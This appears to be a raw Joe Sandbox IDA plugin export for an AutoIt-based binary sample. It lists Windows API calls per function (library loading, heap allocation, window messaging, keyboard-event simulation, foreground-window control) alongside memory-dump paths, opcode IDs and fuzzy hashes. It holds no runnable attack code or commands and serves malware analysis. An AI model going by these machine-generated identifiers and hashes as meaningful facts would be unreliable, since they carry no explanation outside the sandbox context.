  • Part of subcall function 008E4E90: FreeLibrary.KERNEL32(00000000,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EC0
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EFD
  • Part of subcall function 008E4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E62
  • Part of subcall function 008E4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E4E74
  • Part of subcall function 008E4E59: FreeLibrary.KERNEL32(00000000,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E87
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
                                                                    APIs
                                                                      • Part of subcall function 00914C7D: RtlAllocateHeap.NTDLL(00000008,008E1129,00000000,?,00912E29,00000001,00000364,?,?,?,0090F2DE,00913863,009B1444,?,008FFDF5,?), ref: 00914CBE
                                                                    • _free.LIBCMT ref: 0091506C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                    • Instruction ID: 1d2729c05727d938cabde99966e51720ac0ecb83c97a84c8e72dcc4a8515f11f
                                                                    • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                    • Instruction Fuzzy Hash: 71012B72304708ABE3218F559841ADAFBECFBC9370F66051DE194932C0E6306845C6B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                    • Instruction ID: 06f5a3f64737e294255afaffbf0d893b761c9d39ddeb74f3f0606aea3518063d
                                                                    • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                    • Instruction Fuzzy Hash: 69F02832611A189ED7313A69AC05B9B339C9FD2335F100F15F431D71D2CF75E84186A5
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,008E1129,00000000,?,00912E29,00000001,00000364,?,?,?,0090F2DE,00913863,009B1444,?,008FFDF5,?), ref: 00914CBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 311a99f5267ca7087aee1c41914c691aab27b2675ed3eda767eebaabf900ea71
                                                                    • Instruction ID: fc4647b72c511a57fba32a46852a5b3a57586ae49ae36da7b72186986cef8eb7
                                                                    • Opcode Fuzzy Hash: 311a99f5267ca7087aee1c41914c691aab27b2675ed3eda767eebaabf900ea71
                                                                    • Instruction Fuzzy Hash: ABF0E93174622C6BDB215F669C09BDA378CBF957B0B148125BDA9A65D0CA30D88096E0
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 949542fa992ac8339cca61fb5dd72c49195c38ca560ccaafc0f420c93595d499
                                                                    • Instruction ID: f8884b01ee2ea1e994d23fe7d97739796a8870a45df305c689955a5df57e81bd
                                                                    • Opcode Fuzzy Hash: 949542fa992ac8339cca61fb5dd72c49195c38ca560ccaafc0f420c93595d499
                                                                    • Instruction Fuzzy Hash: A6E0E53130422C9AD63127669C04BDA377CAB827B0F05C1A0BD1992CD0DB10DE8181E0
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4F6D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: aba62eff02de8c96a8c36b1319aed24b86256494beaf5591456e53f7b498a9d3
                                                                    • Instruction ID: d90350bcfebac2d20f774561b9dec24329e37a17f818ee33feeae29d90d01794
                                                                    • Opcode Fuzzy Hash: aba62eff02de8c96a8c36b1319aed24b86256494beaf5591456e53f7b498a9d3
                                                                    • Instruction Fuzzy Hash: A6F01C71105791CFDB349F66D494812B7E4FF15719310997EE1EE82511CB359C84DB50
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E2DC4
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath_wcslen
                                                                    • String ID:
                                                                    • API String ID: 541455249-0
                                                                    • Opcode ID: 6de7f2b415c3557f34796a73351ae0f1800bde45458397852044a18c8d4481e3
                                                                    • Instruction ID: 13802ecb18c35bd67c5232ebfa84e1d4e3c7560424a0c3fdd0aab5e663a6726a
                                                                    • Opcode Fuzzy Hash: 6de7f2b415c3557f34796a73351ae0f1800bde45458397852044a18c8d4481e3
                                                                    • Instruction Fuzzy Hash: 7EE0CD726041245BC71092589C05FDA77DDEFC87D0F040075FD09D7258DA60EDC08551
                                                                    APIs
                                                                      • Part of subcall function 008E3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E3908
                                                                      • Part of subcall function 008ED730: GetInputState.USER32 ref: 008ED807
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008E2B6B
                                                                      • Part of subcall function 008E30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 008E314E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                    • String ID:
                                                                    • API String ID: 3667716007-0
                                                                    • Opcode ID: 8803b4c9586b8534a2cfd85091891b75048461d1b367956c5b48aca7c67f3661
                                                                    • Instruction ID: fe90da762833e17b94a52b9526af4db108ef09596f1607f93f2e385b3f0e9d99
                                                                    • Opcode Fuzzy Hash: 8803b4c9586b8534a2cfd85091891b75048461d1b367956c5b48aca7c67f3661
                                                                    • Instruction Fuzzy Hash: 0BE0DF2230828402C604BB2AA82A5ADA34AEBD3321F80053EF092C3172CE2049894213
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00920704,?,?,00000000,?,00920704,00000000,0000000C), ref: 009203B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 23d56db177c32b5e78b96f0b89fbd678b0cc3da2375502f27194c18e6b2fe9c1
                                                                    • Instruction ID: ca51e2242a9ba4596f7ea85d6db6aeccfe885bf89c32f0bbdc503813700dc767
                                                                    • Opcode Fuzzy Hash: 23d56db177c32b5e78b96f0b89fbd678b0cc3da2375502f27194c18e6b2fe9c1
                                                                    • Instruction Fuzzy Hash: 8CD06C3205410DBBDF028F84DD06EDA3BAAFB48714F014050BE1856020C732E861AB90
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 008E1CBC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem
                                                                    • String ID:
                                                                    • API String ID: 3098949447-0
                                                                    • Opcode ID: bd322b9f4781a78235aacfa149bd94f55be3f84a0d6e011b67cb6d739b3dffba
                                                                    • Instruction ID: 74923f206605c51bd60fe1e2105ea1e383ee658d0192f30e55ccf7ab100116ee
                                                                    • Opcode Fuzzy Hash: bd322b9f4781a78235aacfa149bd94f55be3f84a0d6e011b67cb6d739b3dffba
                                                                    • Instruction Fuzzy Hash: 39C09B3629C3049FF3144780BD5EF107754E348B10F444101F60D555E3D3E22450F750
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 00BE1A79
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743712764.0000000000BDF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BDF000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bdf000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction ID: 24e621f6f2eef52aed25a27c7de7826fc27bd7c06d7ac84a4c96ff2bce8ba083
                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction Fuzzy Hash: 96E0BF7494124EEFDB00DFA8D6496ED7BB4EF04301F1005A5FD05D7680DB309E548A62
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 00BE1A79
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743712764.0000000000BDF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BDF000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bdf000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction ID: 7ccc185bd22328ec89e7d3df40233758a98d3406487de4b53d033097f432bed2
                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction Fuzzy Hash: 2FE0E67494124EDFDB00DFB8D6496ED7BF4EF04301F1005A5FD05D2280D7309D508A62
                                                                    APIs
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0097961A
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0097965B
                                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0097969F
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009796C9
                                                                    • SendMessageW.USER32 ref: 009796F2
                                                                    • GetKeyState.USER32(00000011), ref: 0097978B
                                                                    • GetKeyState.USER32(00000009), ref: 00979798
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009797AE
                                                                    • GetKeyState.USER32(00000010), ref: 009797B8
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009797E9
                                                                    • SendMessageW.USER32 ref: 00979810
                                                                    • SendMessageW.USER32(?,00001030,?,00977E95), ref: 00979918
                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0097992E
                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00979941
                                                                    • SetCapture.USER32(?), ref: 0097994A
                                                                    • ClientToScreen.USER32(?,?), ref: 009799AF
                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009799BC
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009799D6
                                                                    • ReleaseCapture.USER32 ref: 009799E1
                                                                    • GetCursorPos.USER32(?), ref: 00979A19
                                                                    • ScreenToClient.USER32(?,?), ref: 00979A26
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00979A80
                                                                    • SendMessageW.USER32 ref: 00979AAE
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00979AEB
                                                                    • SendMessageW.USER32 ref: 00979B1A
                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00979B3B
                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00979B4A
                                                                    • GetCursorPos.USER32(?), ref: 00979B68
                                                                    • ScreenToClient.USER32(?,?), ref: 00979B75
                                                                    • GetParent.USER32(?), ref: 00979B93
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00979BFA
                                                                    • SendMessageW.USER32 ref: 00979C2B
                                                                    • ClientToScreen.USER32(?,?), ref: 00979C84
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00979CB4
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00979CDE
                                                                    • SendMessageW.USER32 ref: 00979D01
                                                                    • ClientToScreen.USER32(?,?), ref: 00979D4E
                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00979D82
                                                                      • Part of subcall function 008F9944: GetWindowLongW.USER32(?,000000EB), ref: 008F9952
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00979E05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                    • String ID: @GUI_DRAGID$F
                                                                    • API String ID: 3429851547-4164748364
                                                                    • Opcode ID: 12d72473ad76ab484c8e0f0709cc9ffd1236096c8582bbb16a9d0426b2a4cd77
                                                                    • Instruction ID: e019a6dcb2e108706d1d2e8040a9117aa28c5f2e469d63916f2fdb9115613a5d
                                                                    • Opcode Fuzzy Hash: 12d72473ad76ab484c8e0f0709cc9ffd1236096c8582bbb16a9d0426b2a4cd77
                                                                    • Instruction Fuzzy Hash: 07429F72208241AFD724CF28CC84EAABBE9FF49724F14861DF69D872A1D731E850DB51
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 009748F3
                                                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00974908
                                                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00974927
                                                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0097494B
                                                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0097495C
                                                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0097497B
                                                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 009749AE
                                                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 009749D4
                                                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00974A0F
                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00974A56
                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00974A7E
                                                                    • IsMenu.USER32(?), ref: 00974A97
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00974AF2
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00974B20
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00974B94
                                                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00974BE3
                                                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00974C82
                                                                    • wsprintfW.USER32 ref: 00974CAE
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00974CC9
                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00974CF1
                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00974D13
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00974D33
                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00974D5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                    • String ID: %d/%02d/%02d
                                                                    • API String ID: 4054740463-328681919
                                                                    • Opcode ID: 17e24f206e742168ba392b1d936f3ade60358d7a943aa60e366ccceb38ed227f
                                                                    • Instruction ID: f903ff482444356f82bb6a63bc460559fce8aa3f1ab6b89e814dd0ac2b6d8af2
                                                                    • Opcode Fuzzy Hash: 17e24f206e742168ba392b1d936f3ade60358d7a943aa60e366ccceb38ed227f
                                                                    • Instruction Fuzzy Hash: F512D172600259ABEB258F28CC49FAE7BF8FF85710F108529F51ADB2E2D7749941CB50
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 008FF998
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0093F474
                                                                    • IsIconic.USER32(00000000), ref: 0093F47D
                                                                    • ShowWindow.USER32(00000000,00000009), ref: 0093F48A
                                                                    • SetForegroundWindow.USER32(00000000), ref: 0093F494
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0093F4AA
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0093F4B1
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0093F4BD
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0093F4CE
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0093F4D6
                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0093F4DE
                                                                    • SetForegroundWindow.USER32(00000000), ref: 0093F4E1
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F4F6
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0093F501
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F50B
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0093F510
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F519
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0093F51E
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F528
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0093F52D
                                                                    • SetForegroundWindow.USER32(00000000), ref: 0093F530
                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0093F557
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 4125248594-2988720461
                                                                    • Opcode ID: d320d4174f145755e38b8fe2960bd7909d99b7ede16ccf82983d3571542e674a
                                                                    • Instruction ID: b1bd0d4e5a3bbf9f520df1b4909ad01dd5e1fdb025e210e326d5bef981a8d6da
